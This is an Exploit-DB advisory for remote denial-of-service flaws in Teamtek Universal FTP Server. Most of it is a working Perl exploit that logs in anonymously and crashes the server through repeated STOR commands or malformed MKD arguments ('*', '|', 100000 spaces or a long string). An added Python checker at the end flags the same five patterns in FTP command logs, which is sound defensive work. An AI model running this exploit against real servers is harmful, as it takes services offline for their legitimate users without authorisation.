Teamtek Universal FTP Server - Multiple Commands Remote Denial of Service Vulnerabilities

EDB-ID: 29036
Platform: Windows
Date: 2006-11-15

source: https://www.securityfocus.com/bid/21085/info

Universal FTP Server is prone to multiple remote denial-of-service vulnerabilities because the application fails to handle exceptional conditions. 

An attacker can exploit these issues to crash the affected application, denying service to legitimate users. 

We are currently unable to confirm the affected versions due to conflicting product information.

#!/usr/bin/perl -w
     ##########################################################################################################
     ######################Develop Telangana! or Give Telangana!!!#############################################
     ################################INDIA is Great############################################################
     ##########################################################################################################
     #
     # Teamtek Universal FTP Server 1.0.50 allows remote attackers to cause a denial of service
     # (daemon crash or hang) via (1) multiple STOR (aka PUT) commands, or an MKD command followed by
     # (2) a '*' argument, (3) a '|' argument, (4) spaces, or (5) a long string.
     # NOTE: the provenance of this information is unknown; the details are obtained solely
     # from third party information.
     #
     # References:
     #    http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-7235
     #    https://www.securityfocus.com/bid/21085
     #
     # Tested on Windows XP SP1 with
     # Universal FTP Server 1.0.44
     # Banner: UNIVERSAL FTP SERVER - by Daniele Pratelli - www.teamtek.net - www.5e5.net
     # With "mkdir |" command application crashes with "Run-time error '52:' Bad file name or number"
     # With "mkdir *" command application crashes with "Run-time error '76:' Path not found"
     #
     # To run this exploit on MS Windows replace "#!/usr/bin/perl -w" with "#!Installation_path_for_perl -w"
     #     (say #!C:/Perl/bin/perl -w)
     #
     # This was strictly written for educational purpose. Use it at your own risk.
     # Author will not bear any responsibility for any damages whatsoever.
     #
     #  Author: Praveen Darhanam
     #  Email: praveen[underscore]recker[at]sify.com
     #  Blog: http://darshanams.blogspot.com
     #  Date: 20th December, 2008
     #
     ########################################################################################
     use Net::FTP;

     # Connect to the host given as the first argument and log in anonymously.
     $ftp_dos_mkd=Net::FTP->new("$ARGV[0]",Debug=>0)
         || die "Cannot connect to Host $ARGV[0]\n Usage: ]#perl script_name vuln_target_ip or Host\n";
     $ftp_dos_mkd -> login("anonymous","anonymous") || die "Could not Login...Retry";

     # Menu: one entry per trigger condition listed in the header comment.
     print "Enter 1 to launch FTP DoS using multiple STOR/PUT commands\n";
     print "Enter 2 to launch FTP DoS using directory name as * with MKD command\n";
     print "Enter 3 to launch FTP DoS using directory name as | with MKD command\n";
     print "Enter 4 to launch FTP DoS using MKD command followed by spaces\n";
     print "Enter 5 to launch FTP DoS using MKD command followed by long string\n";

     $special_char=<STDIN>;
     chomp($special_char);

     if($special_char==1)
     {
      # (1) repeated STOR commands in an endless loop
      while(1)
      {
       $ftp_dos_mkd -> stor("abc.txt");
      }
     }
     elsif($special_char==2)
     {
      # (2) MKD with '*' as the directory name
      $ftp_dos_mkd -> mkdir("*");
     }
     elsif($special_char==3)
     {
      # (3) MKD with '|' as the directory name
      $ftp_dos_mkd -> mkdir("|");
     }
     elsif($special_char==4)
     {
      # (4) MKD followed by 100000 spaces
      my $buf1 = "\x20" x 100000;
      $ftp_dos_mkd -> mkdir("$buf1");
     }
     elsif($special_char==5)
     {
      # (5) MKD followed by a 100000-character string
      my $buf2 = "D" x 100000;
      $ftp_dos_mkd -> mkdir("$buf2");
     }
     else
     {
      print "Please enter correct number to launch exploit !!\n";
     }

     $ftp_dos_mkd->quit;
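
The five trigger conditions listed in the script header can be checked for on the defensive side, for example in an FTP proxy or when reviewing a session's command log. The following is an added example, not part of the original exploit or of the vendor's code. The function names, both thresholds and the sample session are assumptions constructed here, and the check generalizes from an argument equal to '*' or '|' to any argument containing either character.

```python
# Added example: flag the FTP command patterns named in this advisory.
# Thresholds below are assumptions; tune them to the clients you expect.
MAX_ARG_LEN = 255            # assumed upper bound for a legitimate path argument
MAX_STOR_PER_SESSION = 50    # assumed upper bound for uploads in one session


def check_mkd_argument(arg):
    """Return a reason if an MKD argument matches a listed trigger, else None."""
    if arg == "" or arg.isspace():
        return "MKD argument is empty or only spaces"
    if len(arg) > MAX_ARG_LEN:
        return "MKD argument longer than %d characters" % MAX_ARG_LEN
    if any(ch in arg for ch in "*|"):
        return "MKD argument contains '*' or '|'"
    return None


def scan_session(lines):
    """Return [(line_number, reason)] for one client's command stream."""
    findings, stor_count = [], 0
    for number, raw in enumerate(lines, 1):
        # Strip only the CRLF so that trailing spaces stay part of the argument.
        verb, _, arg = raw.rstrip("\r\n").partition(" ")
        verb = verb.upper()
        if verb == "MKD":
            reason = check_mkd_argument(arg)
            if reason:
                findings.append((number, reason))
        elif verb == "STOR":
            stor_count += 1
            # Report once, at the command that crosses the threshold.
            if stor_count == MAX_STOR_PER_SESSION + 1:
                findings.append((number, "more than %d STOR commands in one session"
                                 % MAX_STOR_PER_SESSION))
    return findings


# Constructed sample session (not captured traffic).
SAMPLE = (["USER anonymous\r\n", "PASS anonymous\r\n", "MKD reports\r\n",
           "MKD *\r\n", "MKD |\r\n", "MKD " + " " * 300 + "\r\n",
           "MKD " + "D" * 300 + "\r\n"] + ["STOR abc.txt\r\n"] * 51)

if __name__ == "__main__":
    for line_no, reason in scan_session(SAMPLE):
        print(line_no, reason)
```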